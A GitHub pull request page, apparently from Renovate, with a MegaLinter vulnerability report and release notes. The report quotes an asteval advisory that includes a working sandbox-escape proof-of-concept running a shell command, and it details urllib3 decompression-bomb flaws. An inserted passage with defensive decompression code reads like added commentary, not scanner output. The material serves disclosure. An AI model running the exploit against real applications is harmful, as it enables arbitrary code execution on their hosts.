fix(deps): update all non-major dependencies#634
Open
renovate[bot] wants to merge 1 commit into master from
| Descriptor | Linter | Files | Fixed | Errors | Warnings | Elapsed time |
|---|---|---|---|---|---|---|
| ✅ ACTION | actionlint | 4 | | 0 | 0 | 0.03s |
| ✅ BASH | bash-exec | 4 | | 0 | 0 | 0.02s |
| ✅ BASH | shellcheck | 4 | | 0 | 0 | 0.16s |
| ✅ BASH | shfmt | 4 | | 0 | 0 | 0.0s |
| ✅ DOCKERFILE | hadolint | 1 | | 0 | 0 | 1.51s |
| ✅ EDITORCONFIG | editorconfig-checker | 50 | | 0 | 0 | 0.04s |
| ✅ JSON | jsonlint | 4 | | 0 | 0 | 0.21s |
| ✅ JSON | npm-package-json-lint | yes | | no | no | 0.61s |
| ✅ JSON | prettier | 4 | | 0 | 0 | 0.62s |
| ✅ JSON | v8r | 4 | | 0 | 0 | 9.82s |
| ⚠️ MARKDOWN | markdownlint | 5 | | 9 | 0 | 0.77s |
| ✅ REPOSITORY | checkov | yes | | no | no | 42.84s |
| ✅ REPOSITORY | devskim | yes | | no | no | 2.01s |
| ✅ REPOSITORY | gitleaks | yes | | no | no | 0.56s |
| ✅ REPOSITORY | git_diff | yes | | no | no | 0.03s |
| ⚠️ REPOSITORY | grype | yes | | 5 | 2 | 47.44s |
| ✅ REPOSITORY | kics | yes | | no | no | 14.4s |
| ✅ REPOSITORY | secretlint | yes | | no | no | 2.26s |
| ✅ REPOSITORY | syft | yes | | no | no | 3.23s |
| ⚠️ REPOSITORY | trivy | yes | | 5 | 2 | 12.92s |
| ✅ REPOSITORY | trivy-sbom | yes | | no | no | 0.75s |
| ✅ REPOSITORY | trufflehog | yes | | no | no | 3.93s |
Detailed Issues
⚠️ REPOSITORY / grype - 5 errors
warning: A medium vulnerability in github-action package: aquasecurity/trivy-action, version 0.33.1 was found at: /.github/workflows/daily-trivy-scan.yaml
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
warning: A medium vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
warning: 2 warnings emitted
error: 5 errors emitted
⚠️ MARKDOWN / markdownlint - 9 errors
samples/charts/sample/README.md:5:9 MD026/no-trailing-punctuation Trailing punctuation in heading [Punctuation: ';']
samples/charts/sample/README.md:8:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo add chgl https://c..."]
samples/charts/sample/README.md:9:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo update"]
samples/charts/sample/README.md:10:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm search repo chgl/sample..."]
samples/charts/sample/README.md:11:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:28:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:40:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm uninstall sample -n sam..."]
samples/charts/sample/README.md:90:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:97:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
⚠️ REPOSITORY / trivy - 5 errors
error: Package: asteval
Installed Version: 1.0.5
Vulnerability CVE-2025-24359
Severity: HIGH
Fixed Version: 1.0.6
Link: [CVE-2025-24359](https://avd.aquasec.com/nvd/cve-2025-24359)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL is an evaluator of Python expressions and statements. Prior to ...
= ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.
error: Package: asteval
Installed Version: 1.0.5
Vulnerability GHSA-vp47-9734-prjw
Severity: HIGH
Fixed Version: 1.0.6
Link: [GHSA-vp47-9734-prjw](https://github.com/advisories/GHSA-vp47-9734-prjw)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape
= ### Summary
If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.
### Details
The vulnerability is rooted in how `asteval` performs attribute access verification. In particular, the [`on_attribute`](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L565) node handler prevents access to attributes that are either present in the `UNSAFE_ATTRS` list or are formed by names starting and ending with `__`, as shown in the code snippet below:
```py
def on_attribute(self, node):    # ('value', 'attr', 'ctx')
    """Extract attribute."""
    ctx = node.ctx.__class__
    if ctx == ast.Store:
        msg = "attribute for storage: shouldn't be here!"
        self.raise_exception(node, exc=RuntimeError, msg=msg)

    sym = self.run(node.value)
    if ctx == ast.Del:
        return delattr(sym, node.attr)

    #
    unsafe = (node.attr in UNSAFE_ATTRS or
              (node.attr.startswith('__') and node.attr.endswith('__')))
    if not unsafe:
        for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
            unsafe = isinstance(sym, dtype) and node.attr in attrlist
            if unsafe:
                break
    if unsafe:
        msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
        self.raise_exception(node, exc=AttributeError, msg=msg)
    else:
        try:
            return getattr(sym, node.attr)
        except AttributeError:
            pass
```
While this check is intended to block access to sensitive Python dunder methods (such as `__getattribute__`), the flaw arises because instances of the `Procedure` class expose their AST (stored in the `body` attribute) without proper protection:
```py
class Procedure:
    """Procedure: user-defined function for asteval.

    This stores the parsed ast nodes as from the 'functiondef' ast node
    for later evaluation.
    """

    def __init__(self, name, interp, doc=None, lineno=0,
                 body=None, args=None, kwargs=None,
                 vararg=None, varkws=None):
        """TODO: docstring in public method."""
        self.__ininit__ = True
        self.name = name
        self.__name__ = self.name
        self.__asteval__ = interp
        self.raise_exc = self.__asteval__.raise_exception
        self.__doc__ = doc
        self.body = body
        self.argnames = args
        self.kwargs = kwargs
        self.vararg = vararg
        self.varkws = varkws
        self.lineno = lineno
        self.__ininit__ = False
```
Since the `body` attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a `Procedure` during runtime to leverage unintended behaviour.
The exploit works as follows:
1. **The Time of Check, Time of Use (TOCTOU) Gadget:**
In the [code](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L577) below, a variable named `unsafe` is set based on whether `node.attr` is considered unsafe:
```python
unsafe = (node.attr in UNSAFE_ATTRS or
          (node.attr.startswith('__') and node.attr.endswith('__')))
```
2. **Exploiting the TOCTOU Gadget:**
An attacker can abuse this gadget by hooking any `Attribute` AST node that is not in the `UNSAFE_ATTRS` list. The attacker modifies the `node.attr.startswith` function so that it points to a custom procedure. This custom procedure performs the following steps:
- It replaces the value of `node.attr` with the string `"__getattribute__"` and returns `False`.
- Thus, when `node.attr.startswith('__')` is evaluated, it returns `False`, which causes the condition to short-circuit and sets `unsafe` to `False`.
- However, by that time, `node.attr` has been changed to `"__getattribute__"`, which will be used in the subsequent `getattr(sym, node.attr)` call. An attacker can then use the obtained reference to `sym.__getattr__` to retrieve malicious attributes without needing to pass the `on_attribute` checks.
### PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:
```py
from asteval import Interpreter

aeval = Interpreter()

code = """
ga_str = "__getattribute__"

def lender():
    a
    b

def pwn():
    ga = lender.dontcare
    init = ga("__init__")
    ga = init.dontcare
    globals = ga("__globals__")
    builtins = globals["__builtins__"]
    importer = builtins["__import__"]
    importer("os").system("whoami")

def startswith1(str):
    # Replace the attr on the targeted AST node with "__getattribute__"
    pwn.body[0].value.attr = ga_str
    return False

def startswith2(str):
    pwn.body[2].value.attr = ga_str
    return False

n1 = lender.body[0]
n1.startswith = startswith1
pwn.body[0].value.attr = n1

n2 = lender.body[1]
n2.startswith = startswith2
pwn.body[2].value.attr = n2

pwn()
"""
aeval(code)
```
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66418
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66418](https://avd.aquasec.com/nvd/cve-2025-66418)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion
= urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. This vulnerability is fixed in 2.6.0.
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66471
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66471](https://avd.aquasec.com/nvd/cve-2025-66471)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 Streaming API improperly handles highly compressed data
= urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data).
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2026-21441
Severity: HIGH
Fixed Version: 2.6.3
Link: [CVE-2026-21441](https://avd.aquasec.com/nvd/cve-2026-21441)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)
= urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted sources.
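The three urllib3 findings above share one root cause: a few kilobytes of highly compressible input are inflated without any bound on the decompressed output. The following is an added example, not urllib3's code and not part of this PR, showing the bounding technique a streaming decoder needs, built on the standard library's `zlib` `max_length` argument. The gzip inputs are constructed inline, and `bounded_gunzip`, `probe` and `DecompressionBombError` are names chosen for this example.

```python
import gzip
import zlib


class DecompressionBombError(Exception):
    """Raised when the decompressed output would exceed the caller's cap."""


def bounded_gunzip(data, max_out, chunk=64 * 1024):
    """Decompress a gzip body while never holding more than `max_out`
    decompressed bytes (hypothetical helper written for this example).

    The guard is zlib's `max_length` argument: `decompressobj.decompress`
    then returns at most that many bytes and parks the unprocessed input on
    `unconsumed_tail`, so a tiny compressed body cannot be inflated to
    gigabytes in one call. A chunked streaming reader bounds each read the
    same way instead of decoding everything it has buffered.
    """
    d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)  # +16: gzip framing
    out = bytearray()
    buf = data
    while not d.eof:
        remaining = max_out - len(out)
        # Ask for one byte more than the remaining budget: receiving it proves
        # the stream is larger than allowed, without inflating the rest.
        piece = d.decompress(buf, max_length=min(chunk, remaining + 1))
        out += piece
        if len(out) > max_out:
            raise DecompressionBombError(
                f"decompressed size exceeds {max_out} bytes "
                f"(compressed input was {len(data)} bytes)"
            )
        buf = d.unconsumed_tail
        if not piece and not buf and not d.eof:
            # No input left, nothing produced, no end-of-stream marker seen.
            raise ValueError("truncated gzip stream")
    return bytes(out)


def probe(data, max_out):
    """Classify a compressed body as 'ok', 'bomb' or 'truncated'."""
    try:
        bounded_gunzip(data, max_out)
    except DecompressionBombError:
        return "bomb"
    except ValueError:
        return "truncated"
    return "ok"


# Constructed sample inputs (not captured from any real server).
SMALL = b"hello, world " * 2000                      # 26,000 bytes of ordinary content
SMALL_GZ = gzip.compress(SMALL)
BOMB_GZ = gzip.compress(b"\0" * (16 * 1024 * 1024))  # 16 MiB of zeros -> a few KiB


if __name__ == "__main__":
    print(f"small body: {probe(SMALL_GZ, 1 << 20)}, "
          f"{len(SMALL_GZ)} -> {len(bounded_gunzip(SMALL_GZ, 1 << 20))} bytes")
    print(f"bomb body:  {probe(BOMB_GZ, 1 << 20)} "
          f"({len(BOMB_GZ)} compressed bytes, capped at {1 << 20})")
```

The cap is enforced per call, so memory stays at `max_out` plus one chunk no matter how favourable the compression ratio is; that is the property the fixed urllib3 releases restore for the streaming API, and why the advisory's interim advice for older versions is to stop following redirects from untrusted servers rather than to trust a read limit.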
warning: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-50181
Severity: MEDIUM
Fixed Version: 2.5.0
Link: [CVE-2025-50181](https://avd.aquasec.com/nvd/cve-2025-50181)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3 redirects are not disabled when retries are disabled on PoolManager instantiation
= urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disables redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.
warning: Artifact: samples/charts/sample/templates/deployment.yaml
Type: helm
Vulnerability KSV0125
Severity: MEDIUM
Message: Container sample in deployment sample (namespace: default) uses an image from an untrusted registry.
Link: [KSV0125](https://avd.aquasec.com/misconfig/ksv0125)
┌─ samples/charts/sample/templates/deployment.yaml:40:1
│
40 │ - name: {{ .Chart.Name }}
│ ^
│
= Restrict container images to trusted registries
= Ensure that all containers use images only from trusted registry domains.
warning: 2 warnings emitted
error: 5 errors emitted
See detailed reports in MegaLinter artifacts.
You could have the same capabilities but better runtime performance if you use a MegaLinter flavor:
- oxsecurity/megalinter/flavors/cupcake@v9.2.0 (88 linters)
Your project could benefit from a custom flavor, which would allow you to run only the linters you need, and thus improve runtime performance. (Skip this info by defining FLAVOR_SUGGESTIONS: false)
- Documentation: Custom Flavors
- Command: `npx mega-linter-runner@9.2.0 --custom-flavor-setup --custom-flavor-linters ACTION_ACTIONLINT,BASH_EXEC,BASH_SHELLCHECK,BASH_SHFMT,DOCKERFILE_HADOLINT,EDITORCONFIG_EDITORCONFIG_CHECKER,JSON_JSONLINT,JSON_V8R,JSON_PRETTIER,JSON_NPM_PACKAGE_JSON_LINT,MARKDOWN_MARKDOWNLINT,REPOSITORY_CHECKOV,REPOSITORY_DEVSKIM,REPOSITORY_GIT_DIFF,REPOSITORY_GITLEAKS,REPOSITORY_GRYPE,REPOSITORY_KICS,REPOSITORY_SECRETLINT,REPOSITORY_SYFT,REPOSITORY_TRIVY,REPOSITORY_TRIVY_SBOM,REPOSITORY_TRUFFLEHOG`
This PR contains the following updates:
- 3.11.10 → 3.11.11
- 5.22.7 → 5.23.0
- 10.1.4 → 10.1.5
- 0.69.1 → 0.69.3
- v1.35.1 → v1.35.2
- 0.20.7 → 0.21.2
- 1.17.0 → 1.17.1
- 0.47.0 → 0.48.0
- 3.0.4 → 3.0.5

Release Notes
FairwindsOps/nova (FairwindsOps/nova)

v3.11.11

Changelog
- 1390f2f Bump libs for nova (#429)
- dbb3323 INS-1830: Bump libs and fix vulnerabilities (#422)
- af994fc INS-1952: Go 1.26 and libs bump for nova (#423)

FairwindsOps/pluto (FairwindsOps/pluto)

v5.23.0

Changelog
- 46b3b71 feat: update versions list for 1.33-35 (#590)

You can verify the signatures of both the checksums.txt file and the published docker images using cosign.

v5.22.8

Changelog
- 6b3a113 INS-1951: Go 1.26 and libs bump for pluto (#588)
- 594311f INS-1832: Bump libs and fix vulnerabilities (#587)

You can verify the signatures of both the checksums.txt file and the published docker images using cosign.

FairwindsOps/polaris (FairwindsOps/polaris)

v10.1.5

Changelog
- f6eed65 Go 1.26
- a5af7bb INS-1950: Go 1.26 and bump libs for polaris (#1172)
- 893e5de Revert "Go 1.26"

You can verify the signature of the checksums.txt file using cosign.

aquasecurity/trivy (aquasecurity/trivy)

v0.69.3

Changelog
- 6fb20c8 release: v0.69.3 [release/v0.69] (#10293)
- dabefec fix(deps): bump github.com/go-git/go-git/v5 from 5.16.4 to 5.16.5 [backport: release/v0.69] (#10291)

google/go-containerregistry (google/go-containerregistry)

v0.21.2

What's Changed

Full Changelog: google/go-containerregistry@v0.21.1...v0.21.2

v0.21.1

This release fixes a regression in `crane` introduced in the previous release.

What's Changed

New Contributors

Full Changelog: google/go-containerregistry@v0.21.0...v0.21.1

v0.21.0

This release updates the minimum Go version to 1.25.6.

What's Changed

New Contributors

Full Changelog: google/go-containerregistry@v0.20.7...v0.21.0

kyverno/kyverno (kyverno/kyverno)

v1.17.1

What's Changed

Full Changelog: kyverno/kyverno@v1.17.0...v1.17.1

igorshubovych/markdownlint-cli (markdownlint-cli)

v0.48.0

Dependabot

sigstore/cosign (sigstore/cosign)

v3.0.5

Deprecations

Features

Bug Fixes

Documentation
Configuration
📅 Schedule: Branch creation - Between 12:00 AM and 03:59 AM, only on Monday ( * 0-3 * * 1 ) (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Enabled.
♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
This PR was generated by Mend Renovate. View the repository job log.